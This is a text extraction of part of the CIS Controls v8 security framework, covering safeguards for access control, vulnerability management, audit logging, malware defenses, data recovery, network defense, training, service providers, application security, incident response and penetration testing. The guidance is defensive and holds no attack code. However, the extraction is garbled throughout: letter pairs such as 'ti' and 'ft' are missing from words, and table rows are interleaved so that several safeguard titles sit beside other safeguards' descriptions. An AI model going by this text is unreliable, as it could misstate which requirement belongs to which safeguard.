Restrict administrator privileges to dedicated administrator accounts on enterprise assets. Conduct general compu ng ac vi es, such as internet
FUNCTION
• •
5.5 Establish and Maintain an Inventory of Service Accounts Users -Iden fy-
browsing, email, and produc vity suite use, from the user’s primary, non-privileged account.••
Establish and maintain an inventory of service accounts. The inventory, at a minimum, must contain department owner, review date, and purpose.
Perform service account reviews to validate that all ac ve accounts are authorized, on a recurring schedule at a minimum quarterly, or more
5.6 Centralize Account Management Users -Protect-
frequently.••
Centralize account management through a directory or iden ty service.

Control 06 / FUNCTION
Safeguard 6.1
— Control 07 / Safeguard 7.5
CONTROL SAFEGUARDNUMBER TITLE/ DESCRIPTION
06 Access Control Management

Use processes and tools to create, assign, manage, and revoke access creden als and privileges for user, administrator, and service accounts for enterprise assets and
so ware.
••• 6.1 Establish an Access Gran ng Process Users -Protect-
6.2 Establish an Access Revoking Process Users -Protect-
Establish and follow a process, preferably automated, for gran ng access to enterprise assets upon new hire, rights grant, or role change of a user.
•••
Establish and follow a process, preferably automated, for revoking access to enterprise assets, through disabling accounts immediately upon
termina on, rights revoca on, or role change of a user. Disabling accounts, instead of dele ng accounts, may be necessary to preserve audit trails.
6.3 Require MFA for Externally-Exposed Applica ons Users -Protect-
•••
Require all externally-exposed enterprise or third-party applica ons to enforce MFA, where supported. Enforcing MFA through a directory service
6.4 Require MFA for Remote Network Access Users -Protect-
or SSO provider is a sa sfactory implementa on of this Safeguard. •••

6.5 Require MFA for Administra ve Access Users -Protect-
Require MFA for remote network access. •••

Require MFA for all administra ve access accounts, where supported, on all enterprise assets, whether managed on-site or through a third-party
provider.
6.6 Establish and Maintain an Inventory of Authen ca on and Users -Iden fy-

FUNCTION
Authoriza on Systems
••
Establish and maintain an inventory of the enterprise’s authen ca on and authoriza on systems, including those hosted on-site or at a remote
6.7 Centralize Access Control Users -Protect-
service provider. Review and update the inventory, at a minimum, annually, or more frequently. ••
6.8 Define and Maintain Role-Based Access Control Data -Protect-
Centralize access control for all enterprise assets through a directory service or SSO provider, where supported. •
Define and maintain role-based access control, through determining and documen ng the access rights necessary for each role within the
enterprise to successfully carry out its assigned du es. Perform access control reviews of enterprise assets to validate that all privileges are
authorized, on a recurring schedule at a minimum annually, or more frequently.
07 Con nuous Vulnerability Management

Develop a plan to con nuously assess and track vulnerabili es on all enterprise assets within the enterprise’s infrastructure, in order to remediate, and minimize, the
window of opportunity for a ackers. Monitor public and private industry sources for new threat and vulnerability informa on.
7.1 Establish and Maintain a Vulnerability Management Process Applica ons -Protect-
• • •
Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documenta on annually, or
7.2 Establish and Maintain a Remedia on Process Applica ons -Respond -
when significant enterprise changes occur that could impact this Safeguard. •••
7.3 Perform Automated Opera ng System Patch Management Applica ons -Protect-
Establish and maintain a risk-based remedia on strategy documented in a remedia on process, with monthly, or more frequent, reviews. ••
•
7.4 Perform Automated Applica on Patch Management Applica ons -Protect-
Perform opera ng system updates on enterprise assets through automated patch management on a monthly, or more frequent, basis. •••

FUNCTION
7.5 Perform Automated Vulnerability Scans of Internal Enterprise Assets Applica ons -Iden fy-
Perform applica on updates on enterprise assets through automated patch management on a monthly, or more frequent, basis. ••
Perform automated vulnerability scans of internal enterprise assets on a quarterly, or more frequent, basis. Conduct both authen cated and
unauthen cated scans, using a SCAP-compliant vulnerability scanning tool.
Applica ons -Iden fy-
7.6 Perform Automated Vulnerability Scans of Externally-Exposed ••

Enterprise Assets
Perform automated vulnerability scans of externally-exposed enterprise assets using a SCAP-compliant vulnerability scanning tool.
7.7 Remediate Detected Vulnerabili es Applica ons -Respond -

Remediate detected vulnerabili es in so ware through processes and tooling on a monthly, or more frequent, basis, based on
remedia on process.

FUNCTION
Perform scans on a monthly, or more frequent,
basis.
••
08 Audit Log Management

Collect, alert, review, and retain audit logs of events that could help detect, understand, or recover from an a ack.
8.1 Establish and Maintain an Audit Log Management Process Network -Protect- •••
Establish and maintain an audit log management process that defines the enterprise’s logging requirements. At a minimum, address the collec on,
review, and reten on of audit logs for enterprise assets. Review and update documenta on annually, or when significant enterprise changes occur
that could impact this Safeguard.
8.2 Collect Audit Logs Network -Detect- •••

Collect audit logs. Ensure that logging, per the enterprise’s audit log management process, has been enabled across enterprise assets.
8.3 Ensure Adequate Audit Log Storage Network -Protect- •••

Ensure that logging des na ons maintain adequate storage to comply with the enterprise’s audit log management process.
8.4 Standardize Time Synchroniza on Network -Protect- ••

Standardize me synchroniza on. Configure at least two synchronized me sources across enterprise assets, where supported.
8.5 Collect Detailed Audit Logs Network -Detect- ••

Configure detailed audit logging for enterprise assets containing sensi ve data. Include event source, date, username, mestamp, source
addresses, des na on addresses, and other useful elements that could assist in a forensic inves ga on.
8.6 Collect DNS Query Audit Logs Network -Detect- ••

Collect DNS query audit logs on enterprise assets, where appropriate and supported.
8.7 Collect URL Request Audit Logs Network -Detect- ••

Collect URL request audit logs on enterprise assets, where appropriate and supported.
8.8 Collect Command-Line Audit Logs Devices -Detect- ••

Collect command-line audit logs. Example implementa ons include collec ng audit logs from PowerShell®, BASH™, and remote
administra ve terminals.
8.9 Centralize Audit Logs Network -Detect- ••

Centralize, to the extent possible, audit log collec on and reten on across enterprise assets.
8.10 ASSET TYPE SECURITY IG1 IG2 IG3

Retain Audit Logs FUNCTION
Network
-Protect- ••
Retain audit logs across enterprise assets for a minimum of 90 days.
8.11 Conduct Audit Log Reviews Network -Detect- ••

Conduct reviews of audit logs to detect anomalies or abnormal events that could indicate a poten al threat. Conduct reviews on a weekly, or more
frequent, basis.
8.12 Collect Service Provider Logs Data -Detect- •

Collect service provider logs, where supported. Example implementa ons include collec ng authen ca on and authoriza on events, data crea on
and disposal events, and user management events.
CONTROL SAFEGUARDNUMBER TITLE/ DESCRIPTION 09

Email and Web Browser Protec ons
Improve protec ons and detec ons of threats from email and web vectors, as these are opportuni es for a ackers to manipulate human behavior through direct
9.1 Ensure Use of Only Fully Supported Browsers and Email Clients Applica ons -Protect-
engagement. •••
Ensure only fully supported browsers and email clients are allowed to execute in the enterprise, only using the latest version of browsers and
9.2 Use DNS Filtering Services Network -Protect-
email clients provided through the vendor. •••

9.3 Maintain and Enforce Network-Based URL Filters Network -Protect-
Use DNS filtering services on all enterprise assets to block access to known malicious domains. ••
Enforce and update network-based URL filters to limit an enterprise asset from connec ng to poten ally malicious or unapproved websites.
Example implementa ons include category-based filtering, reputa on-based filtering, or through the use of block lists. Enforce filters for all
enterprise assets.

9.4
Restrict Unnecessary
or Unauthorized ASSET TYPE SECURITY IG1 IG2 IG3
Browser and Email FUNCTION
Client Extensions
Applica ons -Protect- ••

Restrict, either through uninstalling or disabling, any unauthorized or unnecessary browser or email client plugins, extensions, and add-on
applica ons.
9.5 Implement DMARC Network -Protect- ••

To lower the chance of spoofed or modified emails from valid domains, implement DMARC policy and verifica on, star ng with implemen ng the
Sender Policy Framework (SPF) and the DomainKeys Iden fied Mail (DKIM) standards.
9.6 Block Unnecessary File Types Network -Protect- ••

Block unnecessary file types a emp ng to enter the enterprise’s email gateway.
9.7 Deploy and Maintain Email Server An -Malware Protec ons Network -Protect- •
Deploy and maintain email server an -malware protec ons, such as a achment scanning and/or sandboxing. 10
Malware Defenses
Prevent or control the installa on, spread, and execu on of malicious applica ons, code, or scripts on enterprise assets.
10.1 Deploy and Maintain An -Malware So ware Devices -Protect- •••

Deploy and maintain an -malware so ware on all enterprise assets.
10.2 Configure Automa c An -Malware Signature Updates Devices -Protect- •••

Configure automa c updates for an -malware signature files on all enterprise assets.
10.3 Disable Autorun and Autoplay for Removable Media Devices -Protect- •••
Disable autorun and autoplay auto-execute func onality for removable media.
10.4 Configure Automa c An -Malware Scanning of Removable Media Devices -Detect- ••

Configure an -malware so ware to automa cally scan removable media.
10.5 Enable An -Exploita on Features Devices -Protect- ••

Enable an -exploita on features on enterprise assets and so ware, where possible, such as Microso ® Data Execu on Preven on (DEP),
Windows® Defender Exploit Guard (WDEG), or Apple® System Integrity Protec on (SIP) and Gatekeeper™.
10.6 Centrally Manage An -Malware So ware Devices -Protect- ••

Centrally manage an -malware so ware.

10.7 Use
Behavior-Based An -
Malware So ware ASSET TYPE SECURITY IG1 IG2 IG3
Devices FUNCTION
-Detect-
••
Use behavior-based an -malware so ware.

Safeguard
11.1 — Control 12 / Safeguard 12.8
CONTROL SAFEGUARDNUMBER
TITLE/ DESCRIPTION 11
Data Recovery
Establish and maintain data recovery prac ces sufficient to restore in-scope enterprise assets to a pre-incident and trusted state.
••• 11.1 Establish and Maintain a Data Recovery Process Data -Recover-
Establish and maintain a data recovery process. In the process, address the scope of data recovery ac vi es, recovery priori za on, and the
11.2 Perform Automated Backups Data -Recover-
security of backup data. Review and update documenta on annually, or when significant enterprise changes occur that could impact this
Safeguard. •••
11.3 Protect Recovery Data Data -Protect-
Perform automated backups of in-scope enterprise assets. Run backups weekly, or more frequently, based on the sensi vity of the data. •••
11.4 Establish and Maintain an Isolated Instance of Recovery Data Data -Recover-
Protect recovery data with equivalent controls to the original data. Reference encryp on or data separa on, based on requirements. •••
Establish and maintain an isolated instance of recovery data. Example implementa ons include, version controlling backup des na ons through
11.5 Test Data Recovery Data -Recover-

Test backup recovery quarterly, or more frequently, for a sampling of in-scope enterprise assets.
offline, cloud, or off-site systems or services. ••

12
FUNCTION
Network Infrastructure Management

Establish, implement, and ac vely manage (track, report, correct) network devices, in order to prevent a ackers from exploi ng vulnerable network services and access
points. • 12.1 Ensure Network Infrastructure is Up-to-Date Network -Protect-

••
Ensure network infrastructure is kept up-to-date. Example implementa ons include running the latest stable release of so ware and/ or using
12.2 Establish and Maintain a Secure Network Architecture Network -Protect-
currently supported network-as-a-service (NaaS) offerings. Review so ware versions monthly, or more frequently, to verify so ware support. •
•
Establish and maintain a secure network architecture. A secure network architecture must address segmenta on, least privilege, and availability,
12.3 Securely Manage Network Infrastructure Network -Protect-
at a minimum. ••
Securely manage network infrastructure. Example implementa ons include version-controlled-infrastructure-as-code, and the use of secure
12.4 Establish and Maintain Architecture Diagram(s) Network -Iden fy-
network protocols, such as SSH and HTTPS. ••

Establish and maintain architecture diagram(s) and/or other network system documenta on. Review and update documenta on annually, or
12.5 Centralize Network Authen ca on, Authoriza on, and Audi ng (AAA) Network -Protect-
when significant enterprise changes occur that could impact this Safeguard. ••
12.6 Use of Secure Network Management and Communica on Protocols Network -Protect-
Centralize network AAA. ••

Use secure network management and communica on protocols (e.g., 802.1X, Wi-Fi Protected Access 2 (WPA2) Enterprise or greater).

FUNCTION
•
12.7 Ensure Remote Devices U lize a VPN and are Connec ng to an Enterprise’s Devices -Protect-
AAA Infrastructure ••
Require users to authen cate to enterprise-managed VPN and authen ca on services prior to accessing enterprise resources on enduser devices.
12.8 Establish and Maintain Dedicated Compu ng Resources for All Administra ve Work Devices -Protect-
Establish and maintain dedicated compu ng resources, either physically or logically separated, for all administra ve tasks
administra ve access. The compu ng resources should be segmented from the enterprise’s primary network and not be allowed internet
access.
•
CONTROL SAFEGUARDNUMBER TITLE/ DESCRIPTION
13 Network Monitoring and Defense

Operate processes and tooling to establish and maintain comprehensive network monitoring and defense against security threats across the enterprise’s network
13.1 Centralize Security Event Aler ng Network -Detect-
infrastructure and user base.••

Centralize security event aler ng across enterprise assets for log correla on and analysis. Best prac ce implementa on requires the use of a SIEM,
which includes vendor-defined event correla on alerts. A log analy cs pla orm configured with security-relevant correla on alerts also sa sfies
13.2 Deploy a Host-Based Intrusion Detec on Solu on Devices -Detect-
this Safeguard. ••
13.3 Deploy a Network Intrusion Detec on Solu on Network -Detect-
Deploy a host-based intrusion detec on solu on on enterprise assets, where appropriate and/or supported. ••

FUNCTION
Deploy a network intrusion detec on solu on on enterprise assets, where appropriate. Example implementa ons include the use of a Network
13.4 Perform Traffic Filtering Between Network Segments Network -Protect-
Intrusion Detec on System (NIDS) or equivalent cloud service provider (CSP) service. ••
13.5 Manage Access Control for Remote Assets Devices -Protect-
Perform traffic filtering between network segments, where appropriate. ••

Manage access control for assets remotely connec ng to enterprise resources. Determine amount of access to enterprise resources based on: up-
to-date an -malware so ware installed, configura on compliance with the enterprise’s secure configura on process, and ensuring the opera ng
13.6 Collect Network Traffic Flow Logs Network -Detect-
system and applica ons are up-to-date. ••

13.7 Deploy a Host-Based Intrusion Preven on Solu on Devices -Protect-
Collect network traffic flow logs and/or network traffic to review and alert upon from network devices. •
Deploy a host-based intrusion preven on solu on on enterprise assets, where appropriate and/or supported. Example implementa ons include
use of an Endpoint Detec on and Response (EDR) client or host-based IPS agent.
13.8 Deploy a Network Intrusion Preven on Solu on Network -Protect- •

Deploy a network intrusion preven on solu on, where appropriate. Example implementa ons include the use of a Network Intrusion Preven on
System (NIPS) or equivalent CSP service.
13.9 Deploy Port-Level Access Control Devices -Protect- •

Deploy port-level access control. Port-level access control u lizes 802.1x, or similar network access control protocols, such as cer ficates, and may
incorporate user and/or device authen ca on.
13.10 Perform Applica on Layer Filtering Network -Protect- •

Perform applica on layer filtering. Example implementa ons include a filtering proxy, applica on layer firewall, or gateway.
13.11 Tune Security Event Aler ng Thresholds Network -Detect- •

Tune security event aler ng thresholds monthly, or more frequently. 14
Security Awareness and Skills Training

Establish and FUNCTION
maintain a
security
awareness •
program to influence behavior among the workforce to be security conscious and properly skilled to reduce cybersecurity risks to the enterprise.
14.1 Establish and Maintain a Security Awareness Program N/A -Protect- •••
Establish and maintain a security awareness program. The purpose of a security awareness program is to educate the enterprise’s workforce on
how to interact with enterprise assets and data in a secure manner. Conduct training at hire and, at a minimum, annually. Review and update
14.2 Train Workforce Members to Recognize Social Engineering A acks N/A -Protect-
content annually, or when significant enterprise changes occur that could impact this Safeguard. •••
Train workforce members to recognize social engineering a acks, such as phishing, pre-tex ng, and tailga ng.
-Protect-
14.3 Train Workforce Members on Authen ca on Best Prac ces N/A ••
Train workforce members on authen ca on best prac ces. Example topics include MFA, password composi on, and creden al management. •
14.4 Train Workforce on Data Handling Best Prac ces N/A -Protect-
••
Train workforce members on how to iden fy and properly store, transfer, archive, and destroy sensi ve data. This also includes training workforce
members on clear screen and desk best prac ces, such as locking their screen when they step away from their enterprise asset, erasing physical
14.5 Train Workforce Members on Causes of Uninten onal Data Exposure N/A -Protect-
and virtual whiteboards at the end of mee ngs, and storing data and assets securely. •••
Train workforce members to be aware of causes for uninten onal data exposure. Example topics include mis-delivery of sensi ve data, losing a
14.6 Train Workforce Members on Recognizing and Repor ng Security Incidents N/A -Protect-
portable end-user device, or publishing data to unintended audiences. •••

Train workforce members to be able to recognize a poten al incident and be able to report such an incident.

FUNCTION
Missing 14.7 Train Workforce on How to Iden fy and Report if Their Enterprise Assets are N/A -Protect-
Security
Updates •
••
Train workforce to understand how to verify and report out-of-date so ware patches or any failures in automated processes and tools. Part of this
training should include no fying IT personnel of any failures in automated processes and tools.
14.8 Train Workforce on the Dangers of Connec ng to and Transmi ng Enterprise N/A -Protect-
Data Over
Insecure
Networks
•••
Train workforce members on the dangers of connec ng to, and transmi ng data over, insecure networks for enterprise ac vi es. If the enterprise
has remote workers, training must include guidance to ensure that all users securely configure their home network infrastructure. •••
14.9 Conduct Role-Specific Security Awareness and Skills Training N/A -Protect-
Conduct role-specific security awareness and skills training. Example implementa ons include secure system administra on courses for IT
professionals, OWASP® Top 10 vulnerability awareness and preven on training for web applica on developers, and advanced social engineering
awareness training for high-profile roles.
15 Service Provider Management

Develop a process to evaluate service providers who hold sensi ve data, or are responsible for an enterprise’s cri cal IT pla orms or processes, to ensure these providers
are protec ng those pla orms and data appropriately.
15.1 Establish and Maintain an Inventory of Service Providers N/A -Iden fy-
• • •
Establish and maintain an inventory of service providers. The inventory is to list all known service providers, include classifica on(s), and designate
an enterprise contact for each service provider. Review and update the inventory annually, or when significant enterprise changes occur that could
15.2 Establish and Maintain a Service Provider Management Policy N/A -Iden fy-
impact this Safeguard. ••

Establish and maintain a service provider management policy. Ensure the policy addresses the classifica on, inventory, assessment, monitoring,
and decommissioning of service providers. Review and update the policy annually, or when significant enterprise changes occur that could impact
15.3 Classify Service Providers N/A -Iden fy-
this Safeguard. ••

FUNCTION
•
15.4 Ensure Service Provider Contracts Include Security Requirements N/A -Protect-
Classify service providers. Classifica on considera on may include one or more characteris cs, such as data sensi vity, data volume, availability
requirements, applicable regula ons, inherent risk, and mi gated risk. Update and review classifica ons annually, or when significant enterprise
changes occur that could impact this Safeguard. ••

Ensure service provider contracts include security requirements. Example requirements may include minimum security program requirements,
security incident and/or data breach no fica on and response, data encryp on requirements, and data disposal commitments. These security
requirements must be consistent with the enterprise’s service provider management policy. Review service provider contracts annually to ensure
contracts are not missing security requirements.

Safeguard
15.5 — •
Control 16 / Safeguard 16.7
15.5 Assess Service Providers N/A -Iden fy-
Assess service providers consistent with the enterprise’s service provider management policy. Assessment scope may vary based on classifica on(s),
and may include review of standardized assessment reports, such as Service Organiza on Control 2 (SOC 2) and Payment Card Industry (PCI)
A esta on of Compliance (AoC), customized ques onnaires, or other appropriately rigorous processes. Reassess service providers annually, at a
15.6 Monitor Service Providers Data -Detect-
minimum, or with new and renewed contracts. •

Monitor service providers consistent with the enterprise’s service provider management policy. Monitoring may include periodic reassessment of
15.7 Securely Decommission Service Providers Data -Protect-

Securely decommission service providers. Example considera ons include user and service account deac va on, termina on of
secure disposal of enterprise data within service provider systems.
service provider compliance, monitoring service provider release notes, and dark web monitoring. •
16 Applica on So ware Security

Manage the security life cycle of in-house developed, hosted, or acquired so ware to prevent, detect, and remediate security weaknesses before they can impact the
enterprise.
•• 16.1 Establish and Maintain a Secure Applica on Development Process Applica ons -Protect-
Establish and maintain a secure applica on development process. In the process, address such items as: secure applica on design standards,
secure coding prac ces, developer training, vulnerability management, security of third-party code, and applica on security tes ng procedures.
Review and update documenta on annually, or when significant enterprise changes occur that could impact this Safeguard.
16.2 Establish and Maintain a Process to Accept and Address So ware Applica ons -Protect-
Vulnerabili es ••
Establish and maintain a process to accept and address reports of so ware vulnerabili es, including providing a means for external en es to
report. The process is to include such items as: a vulnerability handling policy that iden fies repor ng process, responsible party for handling

FUNCTION
•
vulnerability reports, and a process for intake, assignment, remedia on, and remedia on tes ng. As part of the process, use a vulnerability
tracking system that includes severity ra ngs, and metrics for measuring ming for iden fica on, analysis, and remedia on of vulnerabili es.
Review and update documenta on annually, or when significant enterprise changes occur that could impact this Safeguard.
Third-party applica on developers need to consider this an externally-facing policy that helps to set expecta ons for outside stakeholders. ••
16.3 Perform Root Cause Analysis on Security Vulnerabili es Applica ons -Protect-
16.4 Establish and Manage an Inventory of Third-Party So ware Components Applica ons -Protect-
Perform root cause analysis on security vulnerabili es. When reviewing vulnerabili es, root cause analysis is the task of evalua ng underlying
issues that create vulnerabili es in code, and allows development teams to move beyond just fixing individual vulnerabili es as they arise. ••
Establish and manage an updated inventory of third-party components used in development, o en referred to as a “bill of materials,” as well as
components slated for future use. This inventory is to include any risks that each third-party component could pose. Evaluate the list at least
16.5 Use Up-to-Date and Trusted Third-Party So ware Components Applica ons -Protect-
monthly to iden fy any changes or updates to these components, and validate that the component is s ll supported. ••
Use up-to-date and trusted third-party so ware components. When possible, choose established and proven frameworks and libraries that
provide adequate security. Acquire these components from trusted sources or evaluate the so ware for vulnerabili es before use.
16.6 Establish and Maintain a Severity Ra ng System and Process for Applica on Applica ons -Protect-
Vulnerabili es ••
Establish and maintain a severity ra ng system and process for applica on vulnerabili es that facilitates priori zing the order in which discovered
vulnerabili es are fixed. This process includes se ng a minimum level of security acceptability for releasing code or applica ons. Severity ra ngs
bring a systema c way of triaging vulnerabili es that improves risk management and helps ensure the most severe bugs are fixed first. Review and
16.7 Use Standard Hardening Configura on Templates for Applica on Infrastructure Applica ons -Protect-
update the system and process annually. ••

Use standard, industry-recommended hardening configura on templates for applica on infrastructure components. This includes underlying
servers, databases, and web servers, and applies to cloud containers, Pla orm as a Service (PaaS) components, and SaaS components. Do not
allow in-house developed so ware to weaken configura on hardening.

-Protect- FUNCTION
16.8
Separate
Produc on and
•
Non-Produc on Systems Applica ons •
16.9 Train Developers in Applica on Security Concepts and Secure Coding Applica ons -Protect-
Maintain separate environments for produc on and non-produc on systems. ••

Ensure that all so ware development personnel receive training in wri ng secure code for their specific development environment and
responsibili es. Training can include general security principles and applica on security standard prac ces. Conduct training at least annually and
16.10 Apply Secure Design Principles in Applica on Architectures Applica ons -Protect-
design in a way to promote security within the development team, and build a culture of security among the developers. ••
Apply secure design principles in applica on architectures. Secure design principles include the concept of least privilege and enforcing media on
to validate every opera on that the user makes, promo ng the concept of “never trust user input.” Examples include ensuring that explicit error
checking is performed and documented for all input, including for size, data type, and acceptable ranges or formats. Secure design also means
minimizing the applica on infrastructure a ack surface, such as turning off unprotected ports and services, removing unnecessary programs and
16.11 Leverage Ve ed Modules or Services for Applica on Security Components Applica ons -Protect-
files, and renaming or removing default accounts. ••

Leverage ve ed modules or services for applica on security components, such as iden ty management, encryp on, and audi ng and logging. Using
pla orm features in cri cal security func ons will reduce developers’ workload and minimize the likelihood of design or implementa on errors.
Modern opera ng systems provide effec ve mechanisms for iden fica on, authen ca on, and authoriza on and make those mechanisms available
to applica ons. Use only standardized, currently accepted, and extensively reviewed encryp on algorithms. Opera ng systems also provide
16.12 Implement Code-Level Security Checks Applica ons -Protect-
mechanisms to create and maintain secure audit logs. •

16.13 Conduct Applica on Penetra on Tes ng Applica ons -Protect-
Apply sta c and dynamic analysis tools within the applica on life cycle to verify that secure coding prac ces are being followed. •
16.14 Conduct Threat Modeling Applica ons -Protect-

FUNCTION
•
Conduct applica on penetra on tes ng. For cri cal applica ons, authen cated penetra on tes ng is be er suited to finding business logic
vulnerabili es than code scanning and automated security tes ng. Penetra on tes ng relies on the skill of the tester to manually manipulate an
applica on as an authen cated and unauthen cated user. •

Conduct threat modeling. Threat modeling is the process of iden fying and addressing applica on security design flaws within a design, before
code is created. It is conducted through specially trained individuals who evaluate the applica on design and gauge security risks for each entry
point and access level. The goal is to map out the applica on, architecture, and infrastructure in a structured way to understand its weaknesses.
17 Incident Response Management

Establish a program to develop and maintain an incident response capability (e.g., policies, plans, procedures, defined roles, training, and communica ons) to prepare,
detect, and quickly respond to an a ack.
17.1 Designate Personnel to Manage Incident Handling N/A -Respond -
• • •
Designate one key person, and at least one backup, who will manage the enterprise’s incident handling process. Management personnel are
responsible for the coordina on and documenta on of incident response and recovery efforts and can consist of employees internal to the
enterprise, third-party vendors, or a hybrid approach. If using a third-party vendor, designate at least one person internal to the enterprise to
oversee any third-party work. Review annually, or when significant enterprise changes occur that could impact this Safeguard. •••
17.2 Establish and Maintain Contact Informa on for Repor ng Security Incidents N/A -Respond -
17.3 Establish and Maintain an Enterprise Process for Repor ng Incidents N/A -Respond -
Establish and maintain contact informa on for par es that need to be informed of security incidents. Contacts may include internal staff, third-
party vendors, law enforcement, cyber insurance providers, relevant government agencies, Informa on Sharing and Analysis Center (ISAC)
partners, or other stakeholders. Verify contacts annually to ensure that informa on is up-to-date. •••
Establish and maintain an enterprise process for the workforce to report security incidents. The process includes repor ng meframe, personnel
to report to, mechanism for repor ng, and the minimum informa on to be reported. Ensure the process is publicly available to all of the
17.4 Establish and Maintain an Incident Response Process N/A -Respond -
workforce. Review annually, or when significant enterprise changes occur that could impact this Safeguard. ••
Establish and maintain an incident response process that addresses roles and responsibili es, compliance requirements, and a communica on
plan. Review annually, or when significant enterprise changes occur that could impact this Safeguard.
Respond
17.5 Assign Key Roles and Responsibili es N/A -- •

FUNCTION
•
17.6 Define Mechanisms for Communica ng During Incident Response N/A -Respond -
Assign key roles and responsibili es for incident response, including staff from legal, IT, informa on security, facili es, public rela ons, human
resources, incident responders, and analysts, as applicable. Review annually, or when significant enterprise changes occur that could impact this
Safeguard. ••
Determine which primary and secondary mechanisms will be used to communicate and report during a security incident. Mechanisms can include
phone calls, emails, or le ers. Keep in mind that certain mechanisms, such as emails, can be affected during a security incident. Review annually,
17.7 Conduct Rou ne Incident Response Exercises N/A -Recover-
or when significant enterprise changes occur that could impact this Safeguard. ••
Plan and conduct rou ne incident response exercises and scenarios for key personnel involved in the incident response process to prepare for
responding to real-world incidents. Exercises need to test communica on channels, decision making, and workflows. Conduct tes ng on an annual
17.8 Conduct Post-Incident Reviews N/A -Recover-
basis, at a minimum. ••
Conduct post-incident reviews. Post-incident reviews help prevent incident recurrence through iden fying lessons learned and follow-up ac on. •
17.9 Establish and Maintain Security Incident Thresholds N/A -Recover-
Establish and maintain security incident thresholds, including, at a minimum, differen a ng between an incident and an event. Examples can
include: abnormal ac vity, security vulnerability, security weakness, data breach, privacy incident, etc. Review annually, or when significant
enterprise changes occur that could impact this Safeguard.
18 Penetra on Tes ng
Test the effec veness and resiliency of enterprise assets through iden fying and exploi ng weaknesses in controls (people, processes, and technology), and simula ng
the
objec ves
and ac ons 18.1 Establish and Maintain a Penetra on Tes ng Program N/A -Iden fy-
of an
a acker. •
•
Establish and maintain a penetra on tes ng program appropriate to the size, complexity, and maturity of the enterprise. Penetra on tes ng
program characteris cs include scope, such as network, web applica on, Applica on Programming Interface (API), hosted services, and physical
18.2 Perform Periodic External Penetra on Tests Network -Iden fy-

FUNCTION
•
premise controls; frequency; limita ons, such as acceptable hours, and excluded a ack types; point of contact informa on; remedia on, such as
how findings will be routed internally; and retrospec ve requirements.••

Perform periodic external penetra on tests based on program requirements, no less than annually. External penetra on tes ng must include
enterprise and environmental reconnaissance to detect exploitable informa on. Penetra on tes ng requires specialized skills and experience and
18.3 Remediate Penetra on Test Findings Network -Protect-
must be conducted through a qualified party. The tes ng may be clear box or opaque box. ••
18.4 Validate Security Measures Network -Protect-
Remediate penetra on test findings based on the enterprise’s policy for remedia on scope and priori za on. •
Validate security measures a er each penetra on test. If deemed necessary, modify rulesets and capabili es to detect the techniques used during
18.5 Perform Periodic Internal Penetra on Tests N/A -Iden fy-
tes ng. •
Perform periodic internal penetra on tests based on program requirements, no less than annually. The tes ng may be clear box or opaque
box.

CIS Controls v8 Page B29

CIS Contr2023

Uploaded by

Copyright:

Available Formats

CIS Contr2023

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CIS Contr2023

Uploaded by

Copyright:

Available Formats

CIS Controls Version 8

CIS Controls v8 Page

CIS Controls v8 Page

Acronyms and Abbrevia ons ............................................................................... vii

Control 01 Inventory and Control of Enterprise Assets ............................................................8

CIS Controls v8 Contents Page i

Why is this Control cri cal? 26

Procedures and tools 27

Control 08 Audit Log Management .......................................................................................29

Why is this Control cri cal? 29

Procedures and tools 29

Control 09 Email and Web Browser Protec ons ....................................................................31

Why is this Control cri cal? 31

Procedures and tools 31

Control 10 Malware Defenses ...............................................................................................34

Why is this Control cri cal? 34

Procedures and tools 34

Control 11 Data Recovery .....................................................................................................36

Why is this Control cri cal? 36

Procedures and tools 37

Control 12 Network Infrastructure Management ...................................................................38

Why is this Control cri cal? 38

Procedures and tools 39

Control 13 Network Monitoring and Defense ........................................................................41

Why is this Control cri cal? 41

Procedures and tools 42

Control 14 Security Awareness and Skills Training ...............................................................44

CIS Controls v8 Contents Page ii

Procedures and tools 44

Control 15 Service Provider Management .............................................................................47

Why is this Control cri cal? 47

Procedures and tools 48

Control 16 Applica on So ware Security .............................................................................50

Why is this Control cri cal? 50

Procedures and tools 51

Control 17 Incident Response Management ..........................................................................55

Why is this Control cri cal? 55

Procedures and tools 56

Control 18 Penetra on Tes ng .............................................................................................58

Why is this Control cri cal? 58

Procedures and tools 59

Appendix A Resources and References ................................................................................. A1

Appendix B Controls and Safeguards Index ........................................................................... B1

CIS Controls v8 Contents Page iii

CIS Controls v8 Glossary Page iv

CIS Controls v8 Glossary Page v

CIS Controls v8 Glossary Page vi

CIS Controls v8 Page vii

Acronyms and Abbrevia ons

CIS Controls v8 viii

CIS Controls v8 Page ix

Evolu on of the CIS Controls

CIS Controls v8 Overview Page 1

This Version of the CIS Controls

Our design principles include:

CIS Controls v8 Overview Page 2

– All CIS Controls, especially for Implementa on Group 1, must be measurable

The CIS Controls Ecosystem (“It’s not about the list”)